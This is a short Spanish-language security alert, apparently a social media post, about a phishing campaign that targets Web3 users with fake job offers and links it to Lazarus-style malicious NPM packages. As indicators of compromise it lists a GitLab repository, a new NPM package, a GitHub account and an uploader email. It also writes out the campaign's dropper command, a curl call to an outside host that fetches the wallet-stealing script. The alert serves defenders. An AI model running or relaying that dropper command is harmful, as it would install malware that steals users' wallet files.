🚨 Alerta de Seguridad TI 🚨

Según el socio de la comunidad @1nf0s3cpt, una campaña activa de phishing está dirigidendo a usuarios de Web3 con ofertas de trabajo falsas (por ejemplo, $120/hora) para engañarlos y hacer que ejecuten un script malicioso que roba archivos de billetera.

🔍 IOCs clave:
🔸Repositorio de GitLab: https://t.co/ivGN93PS4b
🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"

🧪 El método de ataque es muy similar al uso previo de Lazarus de paquetes NPM para difundir código malicioso:
https://t.co/bBC4i2vYpA

🚨 Encontramos que un nuevo paquete NPM malicioso acaba de ser publicado:
https://t.co/SjgmO1FOIL
🔸Probablemente vinculado a GitHub: apollo-hero
🔸Correo del cargador: skelstar125@gmail.com

⚠️ NO instales ni ejecutes paquetes o scripts desconocidos. Siempre verifica las fuentes.

#LAZARUS #Phishing